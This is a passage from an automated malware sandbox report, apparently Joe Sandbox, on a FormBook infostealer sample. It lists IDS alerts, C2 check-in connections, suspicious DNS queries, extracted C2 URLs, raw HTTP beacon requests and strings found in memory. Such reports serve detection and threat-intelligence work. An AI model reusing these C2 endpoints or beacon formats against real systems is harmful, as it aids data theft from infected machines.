Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 88.99.22.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.120.157.187 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 116.62.216.226 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.164.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.76.223 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.140.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.2.194.128 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 203.170.80.250 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.155.212.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 136.143.191.204 80	Jump to behavior

Performs DNS queries to domains with low reputation

Show sources

Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.helpcloud.xyz
Source:	DNS query: www.ozattaos.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz
Source:	DNS query: www.braxtynmi.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: https://atseasonals.com/GHrtt/bin_k
Source: Malware configuration extractor	URLs: www.ayudavida.com/n8ds/

Tries to resolve many domain names, but no domain seems valid

Show sources

Source: unknown	DNS traffic detected: query: www.tvterradafarinha.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.aubzo7o9fm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.koedayuuki.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.recoverytrivia.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.wordpresshostingblog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.abcjanitorialsolutions.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.recruitresumelibrary.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.testwebsite0711.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.diamota.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.braxtynmi.xyz replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.learncodeing.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.3uwz9mpxk77g.biz replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.photon4energy.com replaycode: Name error (3)

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez HTTP/1.1Host: www.unitedmetal-saudi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1Host: www.divorcefearfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1Host: www.jamiecongedo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 3.64.163.50 3.64.163.50

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 11:56:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0expires: 0last-modified: Thu, 25 Nov 2021 11:56:13 GMTpragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wftVfpJA1zZJwjRaaheNSQN%2B47kW8NUpVPnztY9X9CDRJcJK3cSrWrr%2Fkh12oU%2BPDjaHHxgPOGqNMJdKZBB2VmnTOlRI%2FV3g8s4dK2XbZbitRDqmmAxJtUHBGjKUUJ1RfXt9WyadqG7lXv0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b3ab146a9874e37-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: d404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 11:59:31 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: rundll32.exe, 0000000F.00000002.51930274495.0000000004E8C000.00000004.00020000.sdmp, rundll32.exe, 0000000F.00000002.51931184090.0000000005562000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50714620925.0000000040D72000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 0000000F.00000002.51930274495.0000000004E8C000.00000004.00020000.sdmp, rundll32.exe, 0000000F.00000002.51931184090.0000000005562000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50714620925.0000000040D72000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 0000000F.00000002.51930274495.0000000004E8C000.00000004.00020000.sdmp, rundll32.exe, 0000000F.00000002.51931184090.0000000005562000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50714620925.0000000040D72000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)

Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Zr26f1rL6r.exe, 0000000A.00000003.47750089783.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47747204902.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749712400.0000000000897000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47940136411.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749088416.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47748575933.000000000089B000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Zr26f1rL6r.exe, 0000000A.00000003.47750089783.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47747204902.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749712400.0000000000897000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47940136411.00000000008A4000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749088416.00000000008A1000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47748575933.000000000089B000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 0000000E.00000000.48061449754.000000000D0F5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000000E.00000000.47784400038.000000000EEE1000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068529513.000000000EEE1000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47830937531.000000000EEE1000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883514679.000000000EEE1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlAw
Source: explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47825946128.000000000D431000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48062680086.000000000D431000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47877800725.000000000D431000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47779736099.000000000D431000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 0000000E.00000000.47770414117.00000000099E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47869230194.000000000AB30000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47854578029.0000000003060000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.micro
Source: rundll32.exe, 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, rundll32.exe, 0000000F.00000002.51929803226.00000000048A8000.00000004.00020000.sdmp, firefox.exe, 00000019.00000002.50719834239.00000000400B8000.00000004.00020000.sdmp, Zr26f1rL6r.exe, c8ahotgz8h.exe.14.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	String found in binary or memory: http://www.foreca.com
Source: rundll32.exe, 0000000F.00000002.51929871775.0000000004981000.00000004.00020000.sdmp	String found in binary or memory: http://www.hsbp.online
Source: rundll32.exe, 0000000F.00000002.51919439469.00000000005D2000.00000004.00000020.sdmp	String found in binary or memory: http://www.hsbp.online/
Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	String found in binary or memory: http://www.hsbp.online/n8ds/
Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	String found in binary or memory: http://www.hsbp.online/n8ds/%
Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	String found in binary or memory: http://www.hsbp.online/n8ds/J
Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp	String found in binary or memory: http://www.inklusion.online
Source: rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp	String found in binary or memory: http://www.inklusion.online/
Source: rundll32.exe, 0000000F.00000002.51930419796.000000000507B000.00000004.00020000.sdmp	String found in binary or memory: http://www.mackthetruck.com
